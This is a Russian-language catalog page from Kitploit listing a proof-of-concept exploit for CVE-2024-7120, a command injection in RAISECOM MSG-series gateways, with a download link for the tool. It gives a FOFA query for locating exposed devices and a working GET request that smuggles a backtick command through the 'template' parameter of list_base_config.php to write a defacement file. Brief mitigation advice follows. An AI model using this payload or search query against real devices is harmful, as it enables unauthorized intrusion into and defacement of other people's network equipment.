Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-7120-Exploit-by-Dark-07x — Эксплойт доказательства концепции для CVE-2024-7120 внедрения команд в устройствах RAISECOM Gateway. Выполняет произвольные команды через параметр template в list_base_config.php. | Kitploit
Инструменты/GitHubGitHub/jokeir07x/cve-2024-7120-exploit-by-dark-07x
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubjokeir07x/cve-2024-7120-exploit-by-dark-07x

CVE-2024-7120-Exploit-by-Dark-07x

Эксплойт доказательства концепции для CVE-2024-7120 внедрения команд в устройствах RAISECOM Gateway. Выполняет произвольные команды через параметр template в list_base_config.php.

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Инъекция команд в устройствах Raisecom (CVE-2024-7120) Доказательство концепции!

Обзор

Уязвимость инъекции команд была обнаружена в шлюзовых устройствах RAISECOM, затрагивающая модели MSG1200, MSG2100E, MSG2200 и MSG2300. Эта уязвимость позволяет удаленным злоумышленникам выполнять произвольные команды в системе через веб-интерфейс. Проблема находится в скрипте list_base_config.php, а именно через параметр template, затрагивая более 25 112 устройств в Интернете.

✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

Затронутые компоненты

URI: /vpn/list_base_config.php

Описание: list_base_config.php — это веб-компонент интерфейса шлюзовых устройств RAISECOM, используемый для управления конфигурациями VPN. Выявленная уязвимость возникает из-за неправильной обработки параметра template в этом скрипте. Данный параметр можно использовать для выполнения произвольных команд в операционной системе устройства из-за недостаточной очистки ввода.

CWE

CWE-77: Инъекция команд

Эксплуатация

Вот пример того, как можно эксплуатировать уязвимость с помощью команды curl:

root@kitploit:~
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Hacked By Dark 07x}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"

В этом примере команда curl отправляет вредоносный HTTP GET-запрос к скрипту list_base_config.php. В запросе используется параметр template для выполнения команды.

  1. Проверка ввода: Внедрите строгие проверки всех пользовательских вводов, особенно тех, которые могут влиять на системные команды или пути к файлам.
  2. Контроль доступа: Ограничьте доступ к веб-интерфейсу устройства только доверенными сетями и аутентифицированными пользователями.
Скачать инструмент